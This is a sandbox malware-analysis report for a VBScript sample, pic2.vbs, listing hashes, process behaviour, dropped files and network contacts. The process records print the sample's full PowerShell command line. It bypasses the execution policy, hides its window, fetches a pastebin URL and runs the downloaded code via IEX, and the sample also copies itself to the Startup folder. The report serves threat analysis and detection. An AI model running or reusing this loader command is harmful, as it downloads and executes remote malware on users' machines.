analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

pic2.vbs

Full analysis: https://app.any.run/tasks/bd2f1bbf-fa2f-4201-a8ce-f0ee706bc59b
Verdict: Malicious activity
Analysis date: October 14, 2019, 18:07:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: Non-ISO extended-ASCII text, with very long lines, with CRLF, CR line terminators
MD5:

E8FFCAAC670358BF037C640072992836

SHA1:

8647D0ED9F89F7176A575001108F05377A5300DE

SHA256:

04D4E919ED145EFE37FE07A215B4B0DA52259D15D6751E620007D4E085E85F63

SSDEEP:

96:3GBpMkaW2aknyFccLuvJo9xoiXokokf88yaCAuMlqZnHYjuOf55on5qtS6SRefb0:3GBpMk4s4CHR5KLZnHYqyfeglMz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • WScript.exe (PID: 2428)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2880)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2184)
      • WScript.exe (PID: 2428)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2428)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2428"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pic2.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2880"C:\Windows\System32\cmd.exe" /c Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exitC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2184Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exitC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
427
Read events
341
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B5J0SE6W38Y8E9DD0SXJ.temp
MD5:
SHA256:
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a8be.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2428WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pic2.vbstext
MD5:E8FFCAAC670358BF037C640072992836
SHA256:04D4E919ED145EFE37FE07A215B4B0DA52259D15D6751E620007D4E085E85F63
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2184
powershell.exe
104.22.2.84:443
pastebin.com
Cloudflare Inc
US
shared
2184
powershell.exe
163.172.58.164:443
4.top4top.net
Online S.a.s.
FR
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.22.2.84
  • 104.22.3.84
shared
4.top4top.net
  • 163.172.58.164
suspicious

Threats

No threats detected
No debug info